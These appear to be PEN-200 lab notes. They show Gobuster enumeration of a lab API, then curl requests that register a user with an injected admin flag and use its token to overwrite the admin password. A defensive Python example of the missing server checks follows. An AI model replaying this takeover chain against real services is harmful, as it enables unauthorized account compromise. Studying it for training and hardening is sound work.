API From PEN200

A BlackBox Approach

Taking http://192.168.199.16:5002/ as an example, the target is an API.

We can enumerate the API endpoints by brute forcing them with a wordlist.

API paths are often followed by a version number, resulting in a pattern such as:

/api_name/v1

Using Gobuster

The API name is usually descriptive of the feature or data it operates on, followed directly by the version number. With this information, let's try brute forcing the API paths using a wordlist along with Gobuster's pattern feature. We can call this feature with the -p option and a file containing patterns. For our test, we'll create a simple pattern file on our Kali system containing the following text:

{GOBUSTER}/v1 
{GOBUSTER}/v2

In this example, we are using the "{GOBUSTER}" placeholder to match any word from our wordlist, which will be appended with the version number.

┌──(kali㉿kali)-[~/webAttacks]
└─$ cat pattern 
{GOBUSTER}/v1
{GOBUSTER}/v2
┌──(kali㉿kali)-[~/webAttacks]
└─$ gobuster dir -u http://192.168.50.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern

Further, we can enumerate the properties of an API endpoint.

┌──(kali㉿kali)-[~/webAttacks]
└─$ gobuster dir -u http://192.168.199.16:5002/users/v1/admin/ -w /usr/share/wordlists/dirb/small.txt -t 200
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.199.16:5002/users/v1/admin/
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/email                (Status: 405) [Size: 142]
/password             (Status: 405) [Size: 142]
Progress: 959 / 960 (99.90%)
===============================================================
Finished
===============================================================
┌──(kali㉿kali)-[~/webAttacks]
└─$ curl http://192.168.199.16:5002/users/v1  
{
  "users": [
    {
      "email": "mail1@mail.com", 
      "username": "name1"
    }, 
    {
      "email": "mail2@mail.com", 
      "username": "name2"
    }, 
    {
      "email": "admin@mail.com", 
      "username": "admin"
    }
  ]
}
┌──(kali㉿kali)-[~/webAttacks]
└─$ curl -i http://192.168.199.16:5002/users/v1/admin         
HTTP/1.0 200 OK
Content-Type: application/json
Content-Length: 48
Server: Werkzeug/1.0.1 Python/3.7.13
Date: Sun, 15 Oct 2023 07:29:05 GMT

{"username": "admin", "email": "admin@mail.com"}
┌──(kali㉿kali)-[~/webAttacks]
└─$ curl -i http://192.168.199.16:5002/users/v1/admin/password
HTTP/1.0 405 METHOD NOT ALLOWED
Content-Type: application/problem+json
Content-Length: 142
Server: Werkzeug/1.0.1 Python/3.7.13
Date: Sun, 15 Oct 2023 07:30:46 GMT

{
  "detail": "The method is not allowed for the requested URL.",
  "status": 405,
  "title": "Method Not Allowed",
  "type": "about:blank"
}
┌──(kali㉿kali)-[~/webAttacks]
└─$ curl -X OPTIONS -i http://192.168.199.16:5002/users/v1/admin/password
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Allow: PUT, OPTIONS
Content-Length: 0
Server: Werkzeug/1.0.1 Python/3.7.13
Date: Sun, 15 Oct 2023 07:30:31 GMT


Checking Login/Register Functionalities

┌──(kali㉿kali)-[~/webAttacks]
└─$ curl -i http://192.168.199.16:5002/users/v1/login               
HTTP/1.0 404 NOT FOUND
Content-Type: application/json
Content-Length: 48
Server: Werkzeug/1.0.1 Python/3.7.13
Date: Sun, 15 Oct 2023 07:33:18 GMT

{ "status": "fail", "message": "User not found"} 


┌──(kali㉿kali)-[~/webAttacks]
└─$ curl -d '{"password":"fake","username":"admin"}' -H 'Content-Type: application/json'  http://192.168.199.16:5002/users/v1/login
{ "status": "fail", "message": "Password is not correct for the given username."} 


┌──(kali㉿kali)-[~/webAttacks]
└─$ curl -d '{"password":"lab","username":"getsystem","email":"asd@asd.com","admin":"True"}' -H 'Content-Type: application/json' http://192.168.199.16:5002/users/v1/register
{"message": "Successfully registered. Login to receive an auth token.", "status": "success"}    

┌──(kali㉿kali)-[~/webAttacks]
└─$ curl -d '{"password":"lab","username":"getsystem"}' -H 'Content-Type: application/json'  http://192.168.199.16:5002/users/v1/login
{"auth_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2OTczNTU4MjksImlhdCI6MTY5NzM1NTUyOSwic3ViIjoiZ2V0c3lzdGVtIn0.PuaWLymbmn6jaf1qCoURmyjJ6Xbm9onFgqwdf_-Ipt4", "message": "Successfully logged in.", "status": "success"}   
┌──(kali㉿kali)-[~/webAttacks]
└─$ curl -X PUT -i http://192.168.199.16:5002/users/v1/admin/password -H 'Content-Type: application/json' -H 'Authorization: OAuth eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2OTczNTU4MjksImlhdCI6MTY5NzM1NTUyOSwic3ViIjoiZ2V0c3lzdGVtIn0.PuaWLymbmn6jaf1qCoURmyjJ6Xbm9onFgqwdf_-Ipt4' -d '{"password": "pwned"}' 
HTTP/1.0 204 NO CONTENT
Content-Type: application/json
Server: Werkzeug/1.0.1 Python/3.7.13
Date: Sun, 15 Oct 2023 07:41:23 GMT
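The session above ends with a token issued to getsystem changing the admin user's password, after a register request that carried an extra "admin" field. The following is an added example (not code from the course or from the lab API) of the server-side checks that would have blocked both: it decodes the page's JWT to read its subject and lifetime, applies an allowlist to register fields, and requires ownership (or a server-verified admin flag) before a password change. The token is the one from the session above; the users table and the field names are constructed.

```python
import base64
import json

# Token returned by /users/v1/login in the session above (copied, not regenerated)
TOKEN = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
         "eyJleHAiOjE2OTczNTU4MjksImlhdCI6MTY5NzM1NTUyOSwic3ViIjoiZ2V0c3lzdGVtIn0."
         "PuaWLymbmn6jaf1qCoURmyjJ6Xbm9onFgqwdf_-Ipt4")

def b64url_decode(segment):
    # JWT segments drop base64url padding; restore it before decoding
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)

def jwt_claims(token):
    """Parse header and payload for inspection only; the signature is NOT verified here."""
    header, payload, _signature = token.split(".")
    return json.loads(b64url_decode(header)), json.loads(b64url_decode(payload))

# Fields a self-service /register may set; "admin" is deliberately absent (constructed allowlist)
REGISTER_FIELDS = {"username", "password", "email"}

def register(body):
    """Hardened register handler: privilege fields sent by the client are dropped."""
    user = {k: v for k, v in body.items() if k in REGISTER_FIELDS}
    user["admin"] = False  # the server decides privilege, never the request body
    return user

def may_change_password(claims, target_username, users, now):
    """Authorization check a PUT /users/v1/<user>/password endpoint needs after signature verification.

    users: constructed mapping username -> stored record with a server-set 'admin' flag.
    """
    if not (claims["iat"] <= now < claims["exp"]):
        return False  # token outside its validity window
    caller = users.get(claims["sub"])
    if caller is None:
        return False  # subject no longer exists
    # Only the account owner or a server-flagged admin may change this password
    return claims["sub"] == target_username or caller["admin"] is True
```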